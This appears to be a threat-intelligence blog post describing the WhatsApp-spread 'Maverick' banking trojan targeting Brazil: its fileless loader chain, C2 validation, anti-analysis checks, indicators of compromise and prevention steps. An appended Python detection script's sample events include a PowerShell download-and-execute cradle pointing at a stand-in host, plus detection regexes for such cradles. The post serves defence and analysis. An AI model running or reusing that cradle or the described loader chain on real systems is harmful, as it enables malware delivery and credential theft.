A massive campaign targeting Brazilian financial institutions has been identified, with over 62,000 infection attempts blocked within the first 10 days after discovery.
Attributed to the “Water Saci” threat actor, the “Maverick” banking trojan is designed to capture credentials through a combination of remote access, keylogging, and phishing overlay injection. Unlike most pieces of malware, the infection chain is extremely complicated and fully fileless. Let’s take a closer look at how it works.
How It Works
The propagation mechanism for Maverick is referred to as “SORVEPOTEL”, a fully-fileless malware loader that is both self-propagating and designed to execute entirely in memory, evading many signature-based antivirus agents.
- .lnk (Windows shortcut) files are archived into .zip format and distributed en masse via the desktop version of WhatsApp. .lnk is reportedly used because it is not blocked by WhatsApp’s file-sharing filters.
- When a user downloads and executes the file, it launches cmd.exe with obfuscated arguments, which assemble and execute a Windows PowerShell (.ps1) script.
- This PowerShell script contacts a command-and-control domain to download a follow-on PowerShell script. This second script decodes a decimal array and reflectively loads a 64-bit .NET DLL assembly directly into the memory of the PowerShell process.
This in-memory .NET DLL serves as the initial loader for the Maverick framework. Let’s look closer into the actual technical payload.
- Obfuscation: The loader is protected by a commercial obfuscator known as ArmDot, and employs techniques such as Control Flow Flattening to frustrate static analysis by antimalware engines.
- C2 Validation: The process sends an API key in the X-Request-Headers field, computed locally as Base64(HMAC256(Key)) using the hardcoded key “MaverickZapBot2025SecretKey12345”. Requests without a valid key receive no data, so analysis and sandbox tools, and researchers attempting to download the payload directly from the command-and-control URL, get nothing back.
- Shellcode Delivery: Upon successful validation, the command-and-control serves two shellcodes encrypted using Donut and decrypted via XOR. When this step is complete, two .NET executables are loaded, preparing for the next stage.
Maverick’s payload is modular, with each component injected into its own separate instance of powershell_ise.exe:
- The first component utilizes WPPConnect to interface with and hijack the user’s WhatsApp web session, automatically sending the infected .zip archive to all contacts in their address book.
- The second component monitors active browser tabs for domains that match a hardcoded list of financial institutions. If a match is found, it triggers the execution of the final payload.
The final payload is named Maverick.Agent, and contains the core remote access trojan (RAT) functionality.
- To further evade sandboxing or analysis, the agent only executes if it confirms it is running in a Brazilian environment. All four of the following conditions must be met:
  - IsValidBrazilianTimezone(): checks that the time zone is between UTC-5 and UTC-2
  - IsBrazilianLocale(): checks that the language/locale is “pt-BR”
  - IsBrazilianRegion(): checks that the system region is “BR” or “BRA”
  - IsBrazilianDateFormat(): checks that the short date format is “dd/MM/yyyy”
- The agent’s target list is compressed, encrypted, and stored as a base64 string. It includes 26 Brazilian bank websites, 6 cryptocurrency exchange websites, 1 payment platform, and an unknown number of Brazilian hotels.
- If a target website is accessed, the agent provides the attacker with full control over the local machine, including:
- Installing a keylogger to identify and exfiltrate credentials
- Remote access, such as the ability to control the mouse and keyboard, take screenshots, terminate processes, reboot the machine, and more
- Serving phishing overlay pages to capture credentials
- The agent’s command-and-control communication uses the Watson TCP client library for .NET over an SSL tunnel to the host, with the certificate password “Maverick2025!” and the agent authentication password “101593a51d9c40fc8ec162d67504e221”.
Ties to “Coyote”
First detected in 2024, “Coyote” is another banking trojan that is hyper-focused on the Brazil region. Associated with the “Hive0147” threat actor, it is theorized (and Casmer Labs agrees) that the Maverick trojan is an evolution of this highly successful piece of malware.
| Aspect | Coyote | Maverick |
|---|---|---|
| Primary Delivery Mechanism | Phishing emails (.zip with .lnk or .msi files) | WhatsApp (.zip with .lnk) |
| Architecture | Monolithic .NET trojan | Modular design with separate propagation (SORVEPOTEL) and agent (Maverick) components |
| Loader Chain | Squirrel Installer -> NodeJS -> DLL Sideload -> Nim Loader | .LNK -> PowerShell -> In-Memory .NET Loader -> Donut Shellcode |
| Key Innovation | Using the UI Automation framework for credential theft | WhatsApp Web automation (WPPConnect), anti-analysis C2 validation |
| Attribution | Hive0147 | Water Saci |
| Obfuscation | Nim Loader, XOR, Binary Padding | ArmDot, Control Flow Flattening, Donut |

Figure 1. Comparison of tactics, techniques, and procedures (TTPs)
Indicators of Compromise
| Type | Indicator |
|---|---|
| Domain | sorvetenopote[.]com |
| Domain | casadecampoamazonas[.]com |
| Domain | zapgrande[.]com |
| IP Address | 77.111.101.169 |
| IP Address | 181.41.201.184 |
| C2 Artifact | MaverickZapBot2025SecretKey12345 (HMAC Key) |
| C2 Artifact | Maverick2025! (Certificate Password) |
| C2 Artifact | 101593a51d9c40fc8ec162d67504e221 (Agent Password) |
| Detection | HEUR:Trojan-Banker.MSIL.Maverick.gen |
| Detection | HEUR:Trojan.Multi.Powenot.a |
Prevention Methods
- Configure IDS, IPS, and web filters to block all known indicators of compromise (described above).
- Harden endpoints by:
- Restricting or blocking the execution of .lnk files, particularly those originating from .zip archives or downloaded by messaging clients.
- Tightening PowerShell execution policies, enabling script block logging and module logging, and monitoring for suspicious command-line arguments such as Net.WebClient.
- Blocking the execution of powershell_ise.exe for all non-privileged users and non-developer systems.
- Double down on security awareness training, adding in a module or coverage for social engineering attacks delivered via non-traditional vectors such as WhatsApp. Instruct employees to never open unsolicited .zip archives or .lnk files, even if they appear to have originated from a trusted contact.
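The detection logic below is an added example, not code from Casmer Labs or from the campaign. It triages Sysmon-style process-creation events for the SORVEPOTEL chain described above (cmd.exe with obfuscated arguments spawning PowerShell, a Net.WebClient download cradle, reflective loading of a decimal byte array, and powershell_ise.exe being spawned). The sample events and the exact command-line shapes are constructed assumptions; the regexes are illustrative rather than vendor signatures.

```python
"""Triage Windows process-creation events for the SORVEPOTEL/Maverick loader chain."""
import re
from typing import Dict, List

# Constructed sample events (Sysmon Event ID 1 style fields); not real telemetry from this campaign.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "set a=pow&&set b=ershell&&call %a%%b% -w hidden -nop -c ..."'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://stage.example/s2')\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell -nop -c \"[Reflection.Assembly]::Load([byte[]](77,90,144,0,3))\""},
    {"ParentImage": PS, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe",
     "CommandLine": "powershell_ise.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

def _img(event: Dict[str, str], field: str, name: str) -> bool:
    return event[field].lower().endswith("\\" + name)

def _cmd(event: Dict[str, str], pattern: str) -> bool:
    return re.search(pattern, event["CommandLine"], re.I) is not None

# Each rule is a predicate over one event; names are the triage tags reported for a hit.
RULES = {
    "cmd_spawns_powershell": lambda e: _img(e, "ParentImage", "cmd.exe") and _img(e, "Image", "powershell.exe"),
    # Environment-variable splitting of the "powershell" token inside cmd.exe (assumed obfuscation shape).
    "cmd_env_var_obfuscation": lambda e: _img(e, "Image", "cmd.exe") and _cmd(e, r"set\s+\w+=.*call\s+%\w+%"),
    "download_cradle": lambda e: _cmd(e, r"Net\.WebClient|DownloadString|DownloadData"),
    "reflective_assembly_load": lambda e: _cmd(e, r"Reflection\.Assembly\]::Load"),
    # Inline decimal byte array of four or more values, as used to carry the in-memory .NET DLL.
    "decimal_byte_array": lambda e: _cmd(e, r"\[byte\[\]\]\s*\(\s*\d+(\s*,\s*\d+){3,}"),
    "hidden_noprofile": lambda e: _cmd(e, r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b"),
    "powershell_ise_spawned": lambda e: _img(e, "Image", "powershell_ise.exe"),
}

def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules that fire on a single event."""
    return [name for name, rule in RULES.items() if rule(event)]

def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> fired rules, omitting events with no hits."""
    return {i: hits for i, e in enumerate(events) if (hits := detect(e))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], hits)
```

Only the benign notepad.exe event produces no hits; in production the same rules would run over the script block and module logs recommended above, where the obfuscated PowerShell is visible after decoding.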
Conclusion
The Maverick trojan is a highly complicated and effective method for stealing credentials and compromising banks. By targeting the Brazil region exclusively, the Water Saci threat actor has managed to both limit scope and increase the efficacy of their campaigns. As knowledge of this campaign spreads, it is likely that the Maverick trojan will decline in effectiveness, but the framework designed by Water Saci will likely be replicated, moved to other markets, or otherwise altered or improved in the coming months and years.